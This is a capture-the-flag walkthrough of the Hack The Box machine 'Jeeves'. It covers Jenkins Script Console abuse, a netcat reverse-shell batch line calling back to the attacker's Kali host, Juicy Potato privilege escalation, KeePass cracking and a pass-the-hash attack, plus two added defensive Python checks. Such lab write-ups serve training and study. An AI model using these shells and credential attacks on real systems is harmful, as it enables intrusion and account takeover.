Hack The Box — Jeeves
Jeeves is a Medium-rated Hack The Box machine, listed as more challenging than OSCP. Here we exploit Jenkins using a Groovy reverse shell and escalate privileges using Juicy Potato.
An Nmap scan shows us that ports 80, 135, 445 and 50000 are open.
Port 80 hosts an Ask Jeeves webpage; we look at the source code and even directory-bruteforce it, but find nothing useful.
However, when we use dirsearch on port 50000 we find a hidden directory called /askjeeves. DO NOTE that the wordlist we have to use is directory-list 1.0, and it will take quite some time as well. Using any other wordlist will take forever.
The directory brings us to this Jenkins webpage. In Jenkins, if we go to > Manage Jenkins, there is a page called > Script Console where we can run a Groovy script to get a reverse shell. I had worked with Jenkins in a previous CTF, and the exploitation method for this box is the same, so you can refer to my writeup: https://sparshjazz.medium.com/tryhackme-alfred-1b21aef8bef3
Go to > MANAGE JENKINS > SCRIPT CONSOLE
You can easily google "groovy script reverse shell" and get one from the PayloadsAllTheThings GitHub repo.
We run the Groovy reverse shell script and catch the shell on our netcat listener!
We run quick commands like whoami and whoami /priv to see what privileges we have, and systeminfo to find more information about our target machine.
As we can see, the hostname is jeeves, the architecture is x64, and the target is Windows 10 Pro. We can also see that the build is 10586 and that SeImpersonatePrivilege and SeChangeNotifyPrivilege are ENABLED. Thus we know that we can run the Juicy Potato exploit.
About Juicy Potato: we use the Juicy Potato exploit if the Windows build is older than Windows 10 1809 or Windows Server 2019 and the target has SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege enabled. Since the build of our target is older than 1809 and the privilege is enabled as well, we can use it!!! You can refer to this writeup for detailed usage: https://medium.com/r3d-buck3t/impersonating-privileges-with-juicy-potato-e5896b20d505 (HIGHLY RECOMMENDED)
First we have to transfer the Juicy Potato exploit, along with the other necessary files, to our target machine. To transfer files, we will use an SMB server hosted from our Kali machine (make sure that the files you want to upload to the target are in the /home/kali directory if you are following my commands). If you are not familiar with this, do some research and it will be clear. Our target does not support wget or certutil for file transfer, and trust me, an SMB server is best for transferring files!!!
On our target Windows machine, we make a temp directory inside C:\ and run the command to copy the file hosted by the SMB server on our Kali machine. The IP is that of our Kali machine, and we save the file in the C:\temp directory on Windows.
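The two conditions above (OS build and an enabled impersonation privilege) can be turned into a host audit that a defender runs over collected command output. The following is an added example, not code from the original writeup or from the Juicy Potato project; the `systeminfo` and `whoami /priv` excerpts are constructed samples, and 17763 is the build number of Windows 10 1809 and Windows Server 2019.

```python
import re

# Windows 10 1809 and Windows Server 2019 are both build 17763; the writeup's
# rule (older build plus SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege)
# is applied against that number.
FIXED_BUILD = 17763
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Constructed excerpts in the format of `systeminfo` and `whoami /priv` output.
SYSTEMINFO_SAMPLE = """\
Host Name:                 JEEVES
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.10586 N/A Build 10586
System Type:               x64-based PC
"""

WHOAMI_PRIV_SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

def parse_build(systeminfo_text):
    """Return the OS build number from `systeminfo` output, or None if absent."""
    m = re.search(r"^OS Version:\s+\d+\.\d+\.(\d+)", systeminfo_text, re.M)
    return int(m.group(1)) if m else None

def enabled_privileges(whoami_priv_text):
    """Return the set of privilege names that `whoami /priv` reports as Enabled."""
    enabled = set()
    for line in whoami_priv_text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[-1] == "Enabled":
            enabled.add(parts[0])
    return enabled

def potato_exposure(systeminfo_text, whoami_priv_text):
    """Flag an account holding an impersonation privilege on a pre-1809 build."""
    build = parse_build(systeminfo_text)
    privs = enabled_privileges(whoami_priv_text) & IMPERSONATION_PRIVS
    exposed = build is not None and build < FIXED_BUILD and bool(privs)
    return {"build": build, "impersonation_privs": sorted(privs), "exposed": exposed}

if __name__ == "__main__":
    print(potato_exposure(SYSTEMINFO_SAMPLE, WHOAMI_PRIV_SAMPLE))
```

A host flagged as exposed needs either the OS updated past build 17763 or the impersonation privilege removed from the service account; the same check returns False once either is done.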
NOTE: For any further file transfer to the target machine, I'll use the same method. The usage is: copy \\kali-ip\filename C:\temp\filename
(make sure that the file you want to transfer from your Kali machine is in the /home/kali directory) Anyway, moving on…
We have transferred JuicyPotato.exe to the target, along with GetCLSID.ps1, a PowerShell script that helps us find valid CLSIDs for the Juicy Potato attack (download link: https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1).
Once GetCLSID.ps1 is downloaded and you have transferred it to the target, we need to run this PowerShell command.
After running this, a directory called Windows_10_Pro is created automatically, and inside it there is a file called CLSID.list which we can read.
Now we need to transfer a reverse shell payload. You can use an .exe file, a .bat file or a PowerShell reverse shell. However, when I tried to use an .exe reverse shell which I made using msfvenom, it didn't work. Let's use a .bat reverse shell instead.
To do so, first run the command in your Kali to locate the netcat executable
command — locate nc.exe
Next, copy nc.exe from your Kali to Windows as shown below.
Now on your Windows target, make a file called priv.bat with the following code (this is basically a one-liner netcat reverse shell which executes the nc.exe binary we transferred):
C:\temp\nc.exe -e cmd.exe kali-ip 9999
Finally, it's time to run the Juicy Potato exploit. Here -l, which is set to port 9999, is our listening port. We have to start a netcat listener on port 9999 before running this exploit. priv.bat is our reverse shell and -c is our CLSID.
Run it and we will get a shell as SYSTEM
This was the most annoying part of the machine. As per Hack The Box's rules, the root flag should always be in a text file in the Administrator's Desktop folder. However, if you go to > Administrator > Desktop, you will find a file called hm.txt which tells you to go deeper. After this I spent 30 mins looking for txt, xml, ini or any other useful files using the command:
findstr /si password *.txt *.xml *.ini
However, I was unable to find it. After reading a writeup, I found out that this was new to others as well; I got to know that it was something related to Alternate Data Streams and that you need to run a command to actually see it:
dir /r /a:
Alternate Data Streams (ADS) are a feature of NTFS files that can be used to hide information. You can show alternate data streams in a directory listing with the /r switch. (FOR MORE INFORMATION, USE GOOGLE)
Some Windows utilities recognize ADS and some don’t. For example, type, the go-to utility for reading text from a file, does not, so I used the more command, which seemed okay with the following:
To get the root flag, we have to run
more < hm.txt:root.txt
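The following triage helper is an added example, not part of the original writeup: it parses `dir /r` output and lists every non-default stream, skipping the browser-added Zone.Identifier (mark-of-the-web) stream by default so that unexpected hidden data stands out. The listing below is a constructed sample in the `dir /r` format; its sizes and dates are made up.

```python
import re

# `dir /r` prints a regular entry with a date column, and beneath it one line
# per alternate stream carrying only a size and "<file>:<stream>:$DATA".
DIR_HEADER = re.compile(r"^\s*Directory of (?P<path>.+?)\s*$")
ADS_LINE = re.compile(
    r"^\s+(?P<size>[\d,]+)\s+(?P<file>.+?):(?P<stream>[^:]+):\$DATA\s*$")

# Zone.Identifier is the mark-of-the-web stream browsers add to downloads;
# it is expected on downloaded files, so it is skipped by default.
BENIGN_STREAMS = {"Zone.Identifier"}

# Constructed sample in the format of `dir /r`; sizes and dates are made up.
DIR_R_SAMPLE = """\
 Volume in drive C has no label.

 Directory of C:\\Users\\Administrator\\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM            10,240 setup.exe
                                    26 setup.exe:Zone.Identifier:$DATA
               2 File(s)         10,276 bytes
"""

def find_alternate_streams(dir_r_output, ignore_benign=True):
    """Return (directory, file, stream, size) for each non-default NTFS stream."""
    found = []
    current_dir = None
    for line in dir_r_output.splitlines():
        h = DIR_HEADER.match(line)
        if h:
            current_dir = h.group("path")
            continue
        m = ADS_LINE.match(line)
        if not m:
            continue
        if ignore_benign and m.group("stream") in BENIGN_STREAMS:
            continue
        size = int(m.group("size").replace(",", ""))
        found.append((current_dir, m.group("file"), m.group("stream"), size))
    return found

if __name__ == "__main__":
    for directory, name, stream, size in find_alternate_streams(DIR_R_SAMPLE):
        # The writeup reads such a stream with `more < file:stream`; `type` cannot.
        print(f"{directory}\\{name}:{stream}  ({size} bytes)")
```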
[BONUS] Cracking a .kdbx (KeePass) file & using pth-winexe for a pass-the-hash attack
At C:\Users\kohsuke\Documents, I found an interesting file:
Googling the kdbx extension, I discovered that it represents an encrypted data store for a password manager program named KeePass. Figuring that the passwords inside could further my compromise of the box, I downloaded the file and researched the file type more deeply. I learned that the keepass2john utility could extract a password hash from this file that would then be loadable by the hash cracking utility John The Ripper. The process of using keepass2john and John itself to obtain the master password for the KeePass file is shown below.
As indicated by the image, the password for the KeePass file was “moonshine1”. To open the CEH.kdbx data store with this password, I downloaded the portable version of KeePass, executed it, and simply used the >FILE → Open File menu option to load CEH.kdbx. When prompted, I provided the password that John found, which proved sufficient to decrypt the data store and show me many things I wasn’t supposed to see:
NOTE: In order to manually open the KeePass database file from the command line, we can use kpcli. Refer to this writeup by Rana Khalil: https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/more-challenging-than-oscp/jeeves-writeup-w-o-metasploit
I examined each password individually and discovered that the “Backup stuff” password was an NTLM hash aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00. I thought that I could use this in a pass-the-hash attack against the JEEVES machine’s Administrator account to gain elevated privileges. There are numerous tools that could aid us in doing this. I chose to use the simple pth-winexe program, as shown below.
This was a really interesting box, apart from finding the root flag, which was pretty annoying and CTF-like. In this box, we learned that:
- Always directory-bruteforce all web-related ports
- We can get a reverse shell from Jenkins using a Groovy script
- We use the Juicy Potato exploit if the Windows build is older than Windows 10 1809 or Windows Server 2019 and the target has SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege enabled
- In case the Juicy Potato exploit doesn't work, we can try using a .bat reverse shell for the (-p) option or even a PowerShell reverse shell. In case the CLSID doesn't work, we can find valid ones using a script like GetCLSID.ps1
- If we have a .kdbx (KeePass) file, we can crack it using keepass2john
- If we find the NTLM hash of the Windows target, we can use pth-winexe and perform a pass-the-hash attack to get an admin shell.